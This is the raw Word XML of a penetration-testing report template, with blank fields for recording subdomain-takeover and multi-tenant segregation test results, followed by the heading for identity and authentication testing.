          <w:p w14:paraId="6B9E261E" w14:textId="77777777" w:rsidR="00A15A75" w:rsidRDefault="00A15A75" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D294815" w14:textId="77777777" w:rsidR="00A15A75" w:rsidRDefault="00A15A75" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23BF18C9" w14:textId="77777777" w:rsidR="00A15A75" w:rsidRDefault="00A15A75" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7526919C" w14:textId="77777777" w:rsidR="00A15A75" w:rsidRDefault="00A15A75" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63AD0F85" w14:textId="77777777" w:rsidR="00A15A75" w:rsidRDefault="00A15A75" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01395948" w14:textId="77777777" w:rsidR="00A15A75" w:rsidRDefault="00A15A75" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AD0A454" w14:textId="77777777" w:rsidR="00873BEA" w:rsidRDefault="00873BEA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246433" w:rsidRPr="00A51A96" w14:paraId="5C164A95" w14:textId="77777777" w:rsidTr="004609A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="70BEA03D" w14:textId="3471B419" w:rsidR="00246433" w:rsidRPr="003C713F" w:rsidRDefault="00246433" w:rsidP="0085194C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3.7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9C0591" w:rsidRPr="009C0591">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Subdomain Takeover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0640DFED" w14:textId="77777777" w:rsidR="00A15A75" w:rsidRPr="00DB71D0" w:rsidRDefault="00A15A75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3150"/>
        <w:gridCol w:w="3375"/>
      </w:tblGrid>
      <w:tr w:rsidR="00994F56" w:rsidRPr="00A02B04" w14:paraId="73FE0505" w14:textId="77777777" w:rsidTr="00DB71D0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000F645E" w14:textId="77777777" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F56" w:rsidP="00DB71D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02B04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698A26C3" w14:textId="77777777" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F5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94F56" w:rsidRPr="00A02B04" w14:paraId="6EBAA962" w14:textId="77777777" w:rsidTr="00DB71D0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731373CB" w14:textId="77777777" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F56" w:rsidP="00DB71D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02B04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4C4E3100" w14:textId="77777777" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F5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94F56" w:rsidRPr="00A02B04" w14:paraId="59821CB1" w14:textId="77777777" w:rsidTr="00DB71D0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0A011362" w14:textId="0B90742B" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F56" w:rsidP="00DB71D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02B04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Target </w:t>
            </w:r>
            <w:r w:rsidR="00DA35FE">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Domain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665156F7" w14:textId="77777777" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F5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94F56" w:rsidRPr="00A02B04" w14:paraId="01055B91" w14:textId="77777777" w:rsidTr="00DB71D0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6F939FC5" w14:textId="165BE83F" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00084A35" w:rsidP="00DB71D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84A3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Identified Subdomains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0D6530DF" w14:textId="1CDDBF1A" w:rsidR="00994F56" w:rsidRDefault="00994F56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B32E7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084A35" w:rsidRPr="00084A3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List of Discovered Subdomains</w:t>
            </w:r>
            <w:r w:rsidRPr="00B32E7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E10887D" w14:textId="77777777" w:rsidR="00994F56" w:rsidRDefault="00994F56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B512D6D" w14:textId="77777777" w:rsidR="00994F56" w:rsidRDefault="00994F56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96C4CD1" w14:textId="77777777" w:rsidR="00994F56" w:rsidRDefault="00994F56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8E939CA" w14:textId="77777777" w:rsidR="00084A35" w:rsidRDefault="00084A35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4489EEA" w14:textId="77777777" w:rsidR="00084A35" w:rsidRPr="00A02B04" w:rsidRDefault="00084A35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94F56" w:rsidRPr="00A02B04" w14:paraId="3CF8828C" w14:textId="77777777" w:rsidTr="00DB71D0">
        <w:trPr>
          <w:trHeight w:val="2078"/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45967403" w14:textId="26CB4FCD" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00084A35" w:rsidP="00DB71D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084A3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DNS Records Analyzed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37ED629F" w14:textId="514C0B9E" w:rsidR="00994F56" w:rsidRPr="00665222" w:rsidRDefault="00994F56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6522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DB0707" w:rsidRPr="00DB070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A, CNAME, MX, NS, TXT – Details of Inactive Records if found</w:t>
            </w:r>
            <w:r w:rsidRPr="0066522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8ED304D" w14:textId="77777777" w:rsidR="00994F56" w:rsidRDefault="00994F56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E62B8D7" w14:textId="77777777" w:rsidR="00994F56" w:rsidRDefault="00994F56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C59D2CB" w14:textId="77777777" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F56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94F56" w:rsidRPr="00A02B04" w14:paraId="35747FF4" w14:textId="77777777" w:rsidTr="00DB71D0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24B515AB" w14:textId="228F22D6" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00B33F42" w:rsidP="00DB71D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B33F42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NXDOMAIN, SERVFAIL, or REFUSED Responses Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315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20D0EAC" w14:textId="77777777" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F56" w:rsidP="0085194C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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A02B04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37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9F8B63F" w14:textId="77777777" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F56" w:rsidP="0085194C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A02B04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994F56" w:rsidRPr="00A02B04" w14:paraId="250B124B" w14:textId="77777777" w:rsidTr="00DB71D0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515D9127" w14:textId="61541AEC" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00531388" w:rsidP="00DB71D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31388">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Unclaimed Services Identified?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0D965306" w14:textId="5F2F6C4B" w:rsidR="00994F56" w:rsidRDefault="00994F56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595E2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531388" w:rsidRPr="0053138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GitHub Pages, AWS S3, Heroku, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="00595E2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AFBB617" w14:textId="77777777" w:rsidR="00994F56" w:rsidRDefault="00994F56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58570F1" w14:textId="77777777" w:rsidR="00994F56" w:rsidRDefault="00994F56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B4A8632" w14:textId="77777777" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F56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94F56" w14:paraId="0551822F" w14:textId="77777777" w:rsidTr="00DB71D0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34C990E7" w14:textId="78FDEBD9" w:rsidR="00994F56" w:rsidRPr="00E109FF" w:rsidRDefault="00531388" w:rsidP="00DB71D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31388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Attempted Takeover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33C8B699" w14:textId="27D14732" w:rsidR="00994F56" w:rsidRDefault="00AB1712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AB171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Successful/Unsuccessful, Details of Hijacked Subdomain if applicable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611ECC4" w14:textId="77777777" w:rsidR="00994F56" w:rsidRDefault="00994F56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8B4E53B" w14:textId="77777777" w:rsidR="00994F56" w:rsidRDefault="00994F56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AFDCA95" w14:textId="77777777" w:rsidR="00994F56" w:rsidRDefault="00994F56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52B62" w14:paraId="4F91D6BD" w14:textId="77777777" w:rsidTr="00DB71D0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20ABBE23" w14:textId="0EE274DD" w:rsidR="00F52B62" w:rsidRPr="00531388" w:rsidRDefault="00F52B62" w:rsidP="00DB71D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52B62">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Nameserver Expiration or Misconfiguration Found?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3BEEF6AF" w14:textId="77777777" w:rsidR="00F52B62" w:rsidRDefault="00F52B62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F52B6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Risk Details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6C5BF0E" w14:textId="77777777" w:rsidR="00F52B62" w:rsidRDefault="00F52B62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6ADE3D5" w14:textId="77777777" w:rsidR="00F52B62" w:rsidRDefault="00F52B62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7A9FE68" w14:textId="067ED7BE" w:rsidR="00F52B62" w:rsidRDefault="00F52B62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52B62" w14:paraId="4BC42CCA" w14:textId="77777777" w:rsidTr="00DB71D0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3946D7EB" w14:textId="35E35D15" w:rsidR="00F52B62" w:rsidRPr="00F52B62" w:rsidRDefault="007D063E" w:rsidP="00DB71D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D063E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>DNS Zone File Availability &amp; Analysis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68AB0FA9" w14:textId="77777777" w:rsidR="00F52B62" w:rsidRDefault="007D063E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7D063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Details of Findings if applicable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0D2381E" w14:textId="77777777" w:rsidR="007D063E" w:rsidRDefault="007D063E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3FD538E" w14:textId="77777777" w:rsidR="007D063E" w:rsidRDefault="007D063E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E903896" w14:textId="77777777" w:rsidR="007D063E" w:rsidRDefault="007D063E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DD627DD" w14:textId="3A164545" w:rsidR="007D063E" w:rsidRDefault="007D063E" w:rsidP="00851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94F56" w:rsidRPr="00A02B04" w14:paraId="2A454477" w14:textId="77777777" w:rsidTr="00DB71D0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22FC0690" w14:textId="77777777" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F56" w:rsidP="00DB71D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02B04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399492B6" w14:textId="77777777" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F56" w:rsidP="00994F56">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="51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3CD2623" w14:textId="77777777" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F56" w:rsidP="00994F56">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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03CD446" w14:textId="77777777" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F56" w:rsidP="00994F56">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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8A846CF" w14:textId="77777777" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F56" w:rsidP="00994F56">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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AB17B0B" w14:textId="77777777" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F56" w:rsidP="00994F56">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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5CA3AF9" w14:textId="77777777" w:rsidR="00994F56" w:rsidRPr="00A02B04" w:rsidRDefault="00994F56" w:rsidP="008519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255BE8B4" w14:textId="77777777" w:rsidR="00B25E00" w:rsidRPr="00A51A96" w:rsidRDefault="00B25E00" w:rsidP="00B25E00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5E00" w14:paraId="1192DED2" w14:textId="77777777" w:rsidTr="00F62EF1">
        <w:trPr>
          <w:trHeight w:val="4733"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51FB1828" w14:textId="77777777" w:rsidR="00B25E00" w:rsidRDefault="00B25E00" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="28DA9D69" w14:textId="77777777" w:rsidR="00B25E00" w:rsidRDefault="00B25E00" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65D587AE" w14:textId="77777777" w:rsidR="00B25E00" w:rsidRDefault="00B25E00" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BC30370" w14:textId="77777777" w:rsidR="00B25E00" w:rsidRDefault="00B25E00" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1367C8BD" w14:textId="77777777" w:rsidR="00B25E00" w:rsidRDefault="00B25E00" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F8CC777" w14:textId="77777777" w:rsidR="00B25E00" w:rsidRDefault="00B25E00" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="26CCDAAD" w14:textId="77777777" w:rsidR="00B25E00" w:rsidRDefault="00B25E00" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1BEDEC67" w14:textId="77777777" w:rsidR="00B25E00" w:rsidRDefault="00B25E00" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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F03FEE" w:rsidRPr="00A51A96" w14:paraId="451A29E1" w14:textId="77777777" w:rsidTr="00364F0D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="04CCEFDA" w14:textId="532C116C" w:rsidR="00F03FEE" w:rsidRPr="003C713F" w:rsidRDefault="00F03FEE" w:rsidP="008C15E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3.8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9D4003" w:rsidRPr="009D4003">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Segregation in Shared Infrastructures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35687E95" w14:textId="77777777" w:rsidR="00F03FEE" w:rsidRPr="00AF6991" w:rsidRDefault="00F03FEE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3150"/>
        <w:gridCol w:w="3375"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B829D2" w:rsidRPr="00A02B04" w14:paraId="56570F1E" w14:textId="77777777" w:rsidTr="007A12D1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3F7D98C9" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2" w:rsidP="007A12D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02B04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505B36ED" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2" w:rsidP="008C15E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829D2" w:rsidRPr="00A02B04" w14:paraId="2DD3DB33" w14:textId="77777777" w:rsidTr="007A12D1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64EBD6C0" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2" w:rsidP="007A12D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02B04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469A7052" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2" w:rsidP="008C15E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829D2" w:rsidRPr="00A02B04" w14:paraId="7F74CA38" w14:textId="77777777" w:rsidTr="007A12D1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338CEC19" w14:textId="0F82A0F2" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2" w:rsidP="007A12D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02B04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Target </w:t>
            </w:r>
            <w:r w:rsidR="00F54E45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Environment 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2F11AB62" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00CD7BE9" w:rsidRDefault="00CD7BE9" w:rsidP="008C15E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CD7BE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[*Cloud Service, Multi-Tenant Hosting, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA9C7B1" w14:textId="77777777" w:rsidR="00CD7BE9" w:rsidRDefault="00CD7BE9" w:rsidP="008C15E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04A5A3E" w14:textId="70EAD9AD" w:rsidR="00CD7BE9" w:rsidRPr="00A02B04" w:rsidRDefault="00CD7BE9" w:rsidP="008C15E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829D2" w:rsidRPr="00A02B04" w14:paraId="09EFA1AB" w14:textId="77777777" w:rsidTr="007A12D1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3E7ED469" w14:textId="3F882A0A" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00CE2925" w:rsidP="007A12D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E292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Cross-Tenant Access Attempted?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22A7829C" w14:textId="6D72A1FE" w:rsidR="00B829D2" w:rsidRDefault="00B829D2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B32E7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FD3469" w:rsidRPr="00FD346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Resources Tested: Databases, Files, APIs, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="00B32E7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F4A5292" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRDefault="00B829D2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14E71D9" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRDefault="00B829D2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9725E43" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRDefault="00B829D2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396EE4F" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRDefault="00B829D2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041087D" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2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829D2" w:rsidRPr="00A02B04" w14:paraId="2C4BBB83" w14:textId="77777777" w:rsidTr="007A12D1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4919D325" w14:textId="61604BE3" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00FD3469" w:rsidP="007A12D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FD346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Shared Resource Vulnerabilities Detected?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7EC60ADA" w14:textId="6050BE9A" w:rsidR="00B829D2" w:rsidRPr="00665222" w:rsidRDefault="00B829D2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6522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FD3469" w:rsidRPr="00FD346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Misconfigured Caching, Storage, Logging Services, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="0066522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E9B5A4A" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRDefault="00B829D2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8E37D8E" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRDefault="00B829D2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A54A506" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2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829D2" w:rsidRPr="00A02B04" w14:paraId="79717E62" w14:textId="77777777" w:rsidTr="007A12D1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70654C61" w14:textId="755FF45A" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00D25F23" w:rsidP="007A12D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D25F23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Weak IAM or Role Misconfigurations Identified?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315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930237D" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2" w:rsidP="008C15EE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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A02B04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37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6CE7529" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2" w:rsidP="008C15EE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A02B04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B829D2" w:rsidRPr="00A02B04" w14:paraId="44E7BED3" w14:textId="77777777" w:rsidTr="007A12D1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120A634D" w14:textId="449B5816" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00D25F23" w:rsidP="007A12D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25F23">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Configuration &amp; Deployment Issues Detected?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33903174" w14:textId="15927A4C" w:rsidR="00B829D2" w:rsidRDefault="00B829D2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595E2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D25F23" w:rsidRPr="00D25F2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Firewall Misconfigurations, Open Ports, Weak Security Groups, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="00595E2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DC5F69F" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRDefault="00B829D2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E93168A" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRDefault="00B829D2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BD491BD" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2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829D2" w14:paraId="1DD6EEA2" w14:textId="77777777" w:rsidTr="007A12D1">
        <w:trPr>
          <w:trHeight w:val="1223"/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09908337" w14:textId="19F982DE" w:rsidR="00B829D2" w:rsidRPr="00E109FF" w:rsidRDefault="00A43545" w:rsidP="007A12D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43545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Exploit Paths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0806914D" w14:textId="4559DC1F" w:rsidR="00B829D2" w:rsidRDefault="00B829D2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A43545" w:rsidRPr="00A4354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Cross-Tenant Data Leaks, Privilege Escalation, Unauthorized Access,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F00F2E9" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRDefault="00B829D2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28545E4" w14:textId="77777777" w:rsidR="0031286F" w:rsidRDefault="0031286F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829D2" w14:paraId="600B0579" w14:textId="77777777" w:rsidTr="007A12D1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598D762C" w14:textId="00D6AB32" w:rsidR="00B829D2" w:rsidRPr="00531388" w:rsidRDefault="00B015D0" w:rsidP="007A12D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B015D0">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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22FB4E1A" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRDefault="00B829D2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F52B6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Risk Details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DF0064D" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRDefault="00B829D2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C2E7D0F" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRDefault="00B829D2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345D92C" w14:textId="77777777" w:rsidR="0031286F" w:rsidRDefault="0031286F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E806E0F" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRDefault="00B829D2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829D2" w:rsidRPr="00A02B04" w14:paraId="18F4D6A3" w14:textId="77777777" w:rsidTr="007A12D1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79163A85" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2" w:rsidP="007A12D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02B04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Tools/Services Used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64CFF966" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2" w:rsidP="00B015D0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="52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99FAC47" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2" w:rsidP="00B015D0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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DA0DAB0" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2" w:rsidP="00B015D0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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EF262EF" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2" w:rsidP="00B015D0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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3CA5239" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2" w:rsidP="00B015D0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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3C14806" w14:textId="77777777" w:rsidR="00B829D2" w:rsidRPr="00A02B04" w:rsidRDefault="00B829D2" w:rsidP="008C15E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114A9474" w14:textId="77777777" w:rsidR="008E36AA" w:rsidRPr="00A51A96" w:rsidRDefault="008E36AA" w:rsidP="008E36AA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36AA" w14:paraId="400C7138" w14:textId="77777777" w:rsidTr="004D1418">
        <w:trPr>
          <w:trHeight w:val="9107"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="752DEE5E" w14:textId="77777777" w:rsidR="008E36AA" w:rsidRDefault="008E36AA" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E1E903E" w14:textId="77777777" w:rsidR="008E36AA" w:rsidRDefault="008E36AA" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7590A3B7" w14:textId="77777777" w:rsidR="008E36AA" w:rsidRDefault="008E36AA" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48E593CC" w14:textId="77777777" w:rsidR="008E36AA" w:rsidRDefault="008E36AA" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2A63DDBD" w14:textId="77777777" w:rsidR="008E36AA" w:rsidRDefault="008E36AA" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="543E7353" w14:textId="77777777" w:rsidR="008E36AA" w:rsidRDefault="008E36AA" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7ADB24EB" w14:textId="77777777" w:rsidR="008E36AA" w:rsidRDefault="008E36AA" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="31EBB1D6" w14:textId="77777777" w:rsidR="008E36AA" w:rsidRDefault="008E36AA" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="68453B79" w14:textId="77777777" w:rsidR="0031286F" w:rsidRDefault="0031286F" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2B7EF53F" w14:textId="77777777" w:rsidR="0031286F" w:rsidRDefault="0031286F" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="44244F8B" w14:textId="77777777" w:rsidR="0031286F" w:rsidRDefault="0031286F" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22C5AA47" w14:textId="77777777" w:rsidR="00BD47EB" w:rsidRDefault="00BD47EB" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E40490" w14:textId="703FCE37" w:rsidR="00E64055" w:rsidRDefault="00E64055" w:rsidP="00E64055">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64055">
        <w:lastRenderedPageBreak/>
        <w:t>Test 4: Techniques to Assess Identity Management, Authentication, and Authorization Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE9622A" w14:textId="1232C609" w:rsidR="0031286F" w:rsidRPr="009136C3" w:rsidRDefault="006A1FD3" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009136C3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>[*</w:t>
      </w:r>
      <w:r w:rsidR="00093316">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F66B3B" w:rsidRPr="009136C3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>his section</w:t>
      </w:r>
      <w:r w:rsidR="00093316">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A72B74">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>allows you to</w:t>
      </w:r>
      <w:r w:rsidR="00F66B3B" w:rsidRPr="009136C3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> create reports for various tests to identify gaps in user registration, verification, account provisioning processes, and access controls within the web application’s identity management systems</w:t>
      </w:r>
      <w:r w:rsidR="009136C3" w:rsidRPr="009136C3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009136C3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251733E3" w14:textId="77777777" w:rsidR="009136C3" w:rsidRDefault="009136C3" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
